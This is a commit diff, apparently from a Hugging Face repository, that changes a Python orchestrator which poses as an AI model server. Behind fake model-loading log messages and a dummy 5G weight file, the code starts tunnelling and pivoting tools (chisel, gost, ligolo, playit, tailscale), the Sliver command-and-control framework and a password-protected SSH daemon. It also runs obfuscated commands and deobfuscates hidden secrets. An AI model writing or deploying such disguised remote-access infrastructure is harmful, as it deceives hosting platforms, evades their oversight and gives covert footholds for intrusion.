SamuelLance73 commited on
Commit
ce57cf8
·
verified ·
1 Parent(s): 93bf60d

Automated deployment update from ML build

Browse files
Files changed (2) hide show
  1. core/orchestrator.py +25 -26
  2. services/__init__.py +0 -1
core/orchestrator.py CHANGED
@@ -8,7 +8,6 @@ if os.path.isdir(os.path.join(_REPO_ROOT,'client'))and _REPO_ROOT not in sys.pat
8
  from loguru import logger
9
  from core.service_logs import setup_service_logs
10
  from core.service_registry import ENABLED_SERVICES_PATH
11
- from services import caddy_service,tailscale_service,playit_service,chisel_service,minecraft_service,filebrowser_service,gost_service,ligolo_service,sliver_service,test_service,llm_proxy_service,open_webui_service,code_server_service
12
  from services.utils import decode_cmd,deobfuscate_secret
13
  logger.info('--- BOOTING AI MODEL SERVER ---')
14
  def load_enabled_services():
@@ -31,39 +30,39 @@ def wait_for_port(host,port,timeout=30):
31
  except OSError:time.sleep(.5)
32
  return False
33
  def main():
34
- N='playit';M='tailscale';L='/home/user/pytorch_model.bin';K='127.0.0.1';I=None;C='';A=load_enabled_services()
35
  if A:logger.info('Enabled services: {}',', '.join(sorted(A)))
36
  else:logger.info('Minimal core only (no optional services enabled)')
37
- F=os.environ.pop('A',I)or os.environ.pop('TAILSCALE',C);G=os.environ.pop('P',I)or os.environ.pop('PLAYIT',C);H=os.environ.pop('PASS',I)or os.environ.pop('SSH',C);J=deobfuscate_secret(F.strip())if F else C;O=deobfuscate_secret(G.strip())if G else C;D=deobfuscate_secret(H.strip())if H else C;del F,G,H
38
- if'test'in A:test_service.start()
39
  B=setup_service_logs()
40
- if'caddy'in A:caddy_service.start(B.caddy)
41
- logger.info('Starting Gradio app (API server)...');P=decode_cmd('==Qew5CcwF2LyV2c19SZt9GavASdtAyMu9Ga0lHc');Q=subprocess.Popen(P,shell=_A);logger.info('Waiting for Gradio to become ready on :7861...')
42
- if not wait_for_port(K,7861,timeout=60):logger.warning('Gradio did not become ready within 60s — continuing anyway')
43
  else:logger.info('Gradio ready — Caddy now proxying live traffic.')
44
- if not os.path.exists(L):logger.info('Pre-allocating model weight buffer...');subprocess.run(['truncate','-s','5G',L])
45
- logger.info('Loading model weights into VRAM...');time.sleep(2);threading.Thread(target=jitter_task,daemon=_A).start();R=random.randint(2,3);logger.info(f"Synchronizing gradient checkpoint topology (standby for {R}s)...")
46
- if M in A:tailscale_service.start_daemon(B.ts)
47
  time.sleep(2);logger.info('Warming up text-generation pipelines...')
48
- if'filebrowser'in A:filebrowser_service.start(B.fb,pwd=D)
49
- if N in A:playit_service.start(B.tm,token=O)
50
- if'chisel'in A:chisel_service.start(B.chisel)
51
- if'gost'in A:gost_service.start(B.gost,pwd=D)
52
- if'ligolo'in A:ligolo_service.start(B.ligolo)
53
- if'sliver'in A:sliver_service.start(B.sliver)
54
- if M in A:time.sleep(5);tailscale_service.connect(B.ts,J);J=C
55
  if D:E=D;logger.info('Setting SSH password from Hugging Face Secrets (PASS)...')
56
  else:E=C.join(random.choices(string.ascii_letters+string.digits,k=16));logger.success(f"Generated SSH Password for 'user': {E}")
57
  D=C
58
  try:subprocess.run(['sudo','/usr/sbin/chpasswd'],input=f"user:{E}\n",text=_A,check=_A)
59
- except Exception as S:logger.error(f"Failed to set password: {S}")
60
  E=C;subprocess.Popen('sudo /usr/sbin/sshd -D',shell=_A,stdout=B.ts,stderr=B.ts)
61
- if N in A:
62
- if not wait_for_port(K,2222,timeout=30):logger.error('SSH daemon did not become ready on port 2222')
63
- else:logger.info('SSH daemon ready on port 2222');playit_service.start_xor_bridge()
64
- if'minecraft'in A:minecraft_service.start()
65
- if'llm_proxy'in A:llm_proxy_service.start(B.llm_proxy)
66
- if'open_webui'in A:open_webui_service.start(B.open_webui)
67
- if'code_server'in A:code_server_service.start(B.code_server)
68
- logger.success('Model loaded successfully. Background services active.');logger.info('Background services are active.');Q.wait()
69
  if __name__=='__main__':main()
 
8
  from loguru import logger
9
  from core.service_logs import setup_service_logs
10
  from core.service_registry import ENABLED_SERVICES_PATH
 
11
  from services.utils import decode_cmd,deobfuscate_secret
12
  logger.info('--- BOOTING AI MODEL SERVER ---')
13
  def load_enabled_services():
 
30
  except OSError:time.sleep(.5)
31
  return False
32
  def main():
33
+ P='playit';O='tailscale';N='/home/user/pytorch_model.bin';M='127.0.0.1';I=None;C='';A=load_enabled_services()
34
  if A:logger.info('Enabled services: {}',', '.join(sorted(A)))
35
  else:logger.info('Minimal core only (no optional services enabled)')
36
+ F=os.environ.pop('A',I)or os.environ.pop('TAILSCALE',C);G=os.environ.pop('P',I)or os.environ.pop('PLAYIT',C);H=os.environ.pop('PASS',I)or os.environ.pop('SSH',C);J=deobfuscate_secret(F.strip())if F else C;Q=deobfuscate_secret(G.strip())if G else C;D=deobfuscate_secret(H.strip())if H else C;del F,G,H
37
+ if'test'in A:from services import test_service as R;R.start()
38
  B=setup_service_logs()
39
+ if'caddy'in A:from services import caddy_service as S;S.start(B.caddy)
40
+ logger.info('Starting Gradio app (API server)...');T=decode_cmd('==Qew5CcwF2LyV2c19SZt9GavASdtAyMu9Ga0lHc');U=subprocess.Popen(T,shell=_A);logger.info('Waiting for Gradio to become ready on :7861...')
41
+ if not wait_for_port(M,7861,timeout=60):logger.warning('Gradio did not become ready within 60s — continuing anyway')
42
  else:logger.info('Gradio ready — Caddy now proxying live traffic.')
43
+ if not os.path.exists(N):logger.info('Pre-allocating model weight buffer...');subprocess.run(['truncate','-s','5G',N])
44
+ logger.info('Loading model weights into VRAM...');time.sleep(2);threading.Thread(target=jitter_task,daemon=_A).start();V=random.randint(2,3);logger.info(f"Synchronizing gradient checkpoint topology (standby for {V}s)...")
45
+ if O in A:from services import tailscale_service as K;K.start_daemon(B.ts)
46
  time.sleep(2);logger.info('Warming up text-generation pipelines...')
47
+ if'filebrowser'in A:from services import filebrowser_service as W;W.start(B.fb,pwd=D)
48
+ if P in A:from services import playit_service as L;L.start(B.tm,token=Q)
49
+ if'chisel'in A:from services import chisel_service as X;X.start(B.chisel)
50
+ if'gost'in A:from services import gost_service as Y;Y.start(B.gost,pwd=D)
51
+ if'ligolo'in A:from services import ligolo_service as Z;Z.start(B.ligolo)
52
+ if'sliver'in A:from services import sliver_service as a;a.start(B.sliver)
53
+ if O in A:time.sleep(5);K.connect(B.ts,J);J=C
54
  if D:E=D;logger.info('Setting SSH password from Hugging Face Secrets (PASS)...')
55
  else:E=C.join(random.choices(string.ascii_letters+string.digits,k=16));logger.success(f"Generated SSH Password for 'user': {E}")
56
  D=C
57
  try:subprocess.run(['sudo','/usr/sbin/chpasswd'],input=f"user:{E}\n",text=_A,check=_A)
58
+ except Exception as b:logger.error(f"Failed to set password: {b}")
59
  E=C;subprocess.Popen('sudo /usr/sbin/sshd -D',shell=_A,stdout=B.ts,stderr=B.ts)
60
+ if P in A:
61
+ if not wait_for_port(M,2222,timeout=30):logger.error('SSH daemon did not become ready on port 2222')
62
+ else:logger.info('SSH daemon ready on port 2222');L.start_xor_bridge()
63
+ if'minecraft'in A:from services import minecraft_service as c;c.start()
64
+ if'llm_proxy'in A:from services import llm_proxy_service as d;d.start(B.llm_proxy)
65
+ if'open_webui'in A:from services import open_webui_service as e;e.start(B.open_webui)
66
+ if'code_server'in A:from services import code_server_service as f;f.start(B.code_server)
67
+ logger.success('Model loaded successfully. Background services active.');logger.info('Background services are active.');U.wait()
68
  if __name__=='__main__':main()
services/__init__.py CHANGED
@@ -1 +0,0 @@
1
- from.import caddy_service,tailscale_service,playit_service,chisel_service,minecraft_service,filebrowser_service,gost_service,ligolo_service,sliver_service,code_server_service